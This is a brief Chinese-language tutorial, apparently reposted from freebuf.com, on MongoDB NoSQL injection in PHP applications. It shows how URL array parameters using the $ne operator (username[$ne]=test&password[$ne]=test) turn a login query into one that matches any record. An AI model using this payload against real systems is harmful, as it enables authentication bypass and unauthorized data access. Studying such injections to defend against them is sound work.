MongoDB注入 – 作者:东塔安全学院

一、简介

MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。
MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。

二、注入

简单的语句执行,注入
这里我们有一个mongodb的数据库,数据库为test

图片[1]-MongoDB注入 – 作者:东塔安全学院-安全小百科

执行了语句:
db.test.find({username:’test’,password:’test’});
如果此时传入的url如下:
http://127.0.0.1/index.php?username[xx]=test&password=test
则$username就是一个数组
而mongodb对于多维数组的解析使最终执行了如下语句:
db.test.find({username:{‘xx’:’test’},password:’test’});
利用此特性,我们可以传入数据,使数组的键名为一个操作符(大于,小于,等于,不等于等等),完成一些攻击者预期的查询。
http://172.16.1.238:83/index.php?username[$ne]=test&password[$ne]=test

图片[2]-MongoDB注入 – 作者:东塔安全学院-安全小百科

因为传入的键名$ne正是一个mongodb操作符,最终执行了语句
db.test.find({username:{‘$ne’:’test’},password:{‘$ne’:’test’}});

来源:freebuf.com 2020-09-08 18:14:05 by: 东塔安全学院

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论